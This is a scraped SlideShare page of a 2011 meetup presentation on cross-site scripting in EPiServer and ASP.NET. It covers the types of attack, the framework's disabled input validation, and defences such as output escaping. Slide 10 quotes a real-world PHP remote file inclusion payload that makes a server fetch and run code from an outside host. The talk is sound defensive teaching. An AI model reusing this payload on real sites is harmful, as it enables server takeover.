XSS - Presented at EPiServer Meetup in Oslo 25th May 2011


Published on

  • Be the first to comment

  • Be the first to like this

No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide

XSS - Presented at EPiServer Meetup in Oslo 25th May 2011

  1. 1. XSS – Cross site scripting<br />Oslo EPiServer Meetup #7 – 25th May 2011<br />© Creuna<br />Slide 1<br />
  2. 2. Definition<br />Cross site scripting is a form ofattackwheretheattacker is able to run arbitraryjavascriptcode in a web pageviewed by anotheruser<br />XSS compromisestheclient side, not the server<br />Butdependingonthe nature ofthewebsite it can be a serioussecurity risk<br />© Creuna<br />Slide 2<br />
  3. 3. Consequences<br />XSS may be used to <br /> - Stealsessioncookies<br /> - Performany action thattheattackeduser has rights to do, maybeevenwithouthimknowing<br /> - Display false or modifiedcontent<br /> - XSS attacksmayspread like a software worm, for instance in a socialnetworksite. A user posts theattackingcodewhichinfects his friends, they post and so on.<br />© Creuna<br />Slide 3<br />
  4. 4. Two types of XSS<br />Non persistent:<br />A userfollows a malicious link or form from a dangerouswebsite, email, etc. The vulnerable websitewritesthe XSS attack to theresponse, and onlythisuser is affected<br />Persistent:<br />The XSS attackcode is storedonthe vulnerable web site, for instance in a usercomment. All subsequentusersofthe web sitemay be exposed to the XSS attack<br />© Creuna<br />Slide 4<br />
  5. 5. Wheredoesthexssattackcome from?<br />All content from insecuresources is potentiallydangerous<br /> - Form submissions<br /> - Urls<br /> - All othersources, RSS feeds, integrated systems, etc. <br />© Creuna<br />Slide 5<br />
  6. 6. Form submissions<br />DangerouscontentmaycomethroughPOST variables<br />Rememberthat POST requests do not necessarilyoriginate from a form on a pageyouservedtheuser, an attackermaycraft a webpage or requesttargetingyour web site<br />DEMO<br />(Demo showed a simple ASP.NET form writing a submittedtext back to thepageon postback. By defaultdangerous POST variables result in an exception in ASP.NET, so wearecovered, right? Next demo showed same principle in a minimallymodified EPiServer demo site, and the XSS attackwassuccessful. EPiServer turns off ASP.NETs input verification in itsdefaultconfiguration.)<br />© Creuna<br />Slide 6<br />
  7. 7. Url input<br />Do youwritethevalueofRequest.Url back to yourresponse?<br />Yes, even ASP.NET itselfdoesthat<br />DEMO<br />(Demo showedusing a url with XSS in it in a standard ASP.NET web site, and wegot an exception like withthe POST attack. EPiServer proved vulnerable again.)<br />© Creuna<br />Slide 7<br />
  8. 8. EPiServer<br />ASP.NET is normallywellsecuredagainst XSS<br />But EPiServer turnsthis feature off by default<br />We must alwaysgiveexternal input an extrathought in EPiServer, ASP.NETs normal safetynet is turned off!<br />© Creuna<br />Slide 8<br />
  9. 9. How do wesecureourselvesagains XSS?<br />Always make sure to escape data from unsecuresourcesifyouaregoing to write it to theresponse<br />This alsoapplies to urls, like Request.Url<br />Do not trust yourownability to foresee all scenarios so do not writethecode for thisyourself<br />Use a welltested and reviewedframework<br />For instance Microsofts AntiXSS: http://wpl.codeplex.com/<br />© Creuna<br />Slide 9<br />
  10. 10. Are youusing PHP?<br />As PHP is a script language, similarattacksmayactuallycompromisethe server side<br />Real world example from oneofourprojects:<br /><form method="post" action="/no/?_SERVER%25255bDOCUMENT_ROOT%25255d=http://bungalowsdemo.info/images/test.gif”id="aspnetForm"><br />This attackwould make the server run the PHP code in test.gif, which is not a picturebutPHP code<br />The websitebungalowsdemo.info is probablyunknowinglyattacked and used to host theattackcode<br />© Creuna<br />Slide 10<br />
  11. 11. External script files<br />Do youincludeexternal script files in your web site?<br />For instance, do youuseGoogles/Microsofts CDN for javascript?<br />Real world example, web statisticstool:<br /><script src=http://res.xtractor.no/x.jstype="text/javascript"></script> <br />© Creuna<br />Slide 11<br />
  12. 12. External script files<br />Ifyoureferenceexternal script files yougiveanotherdomain/sourcethe right to run javascriptonyour web site<br />Of courseyoucan trust Googles or Microsofts CDN to deliver proper code<br />But a differentdomainmay be vulnerable to DNS attacks<br />An attackermaymanipulate DNS onthelocalmachine or network to deliverexternal scripts from a differentsource<br />If all referenced script files are from the same domain as theviewed web pageyouavoidthisvulnerability<br />© Creuna<br />Slide 12<br />
  13. 13. Questions?<br />© Creuna<br />Slide 13<br />